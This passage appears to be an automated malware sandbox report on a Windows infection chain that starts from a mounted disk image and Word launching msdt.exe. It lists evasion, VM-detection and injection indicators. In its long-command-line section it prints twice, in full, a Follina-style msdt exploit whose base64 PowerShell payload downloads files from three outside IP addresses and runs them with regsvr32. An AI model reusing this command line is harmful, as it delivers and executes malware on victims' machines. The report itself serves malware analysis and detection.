Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6024 Thread sleep count: 6508 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5900 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6024 Thread sleep count: 1582 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6660 Thread sleep count: 9997 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3372 Thread sleep count: 114 > 30
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6508 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1582 Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 2450
Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 1542
Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 9997
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\explorer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Contains capabilities to detect virtual machines
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008BDD62 GetSystemInfo, 24_2_008BDD62
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008BBCFC FindFirstFileW,FindNextFileW, 24_2_008BBCFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049BBCFC FindFirstFileW,FindNextFileW, 38_2_049BBCFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04AABCFC FindFirstFileW,FindNextFileW, 39_2_04AABCFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_0481BCFC FindFirstFileW,FindNextFileW, 40_2_0481BCFC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008BEEBB LoadLibraryA,GetProcAddress, 24_2_008BEEBB
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory protected: page write copy | page execute and write copy | page guard

HIPS / PFW / Operating System Protection Evasion
barindex
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: unknown protection: execute and read and write
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP"
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
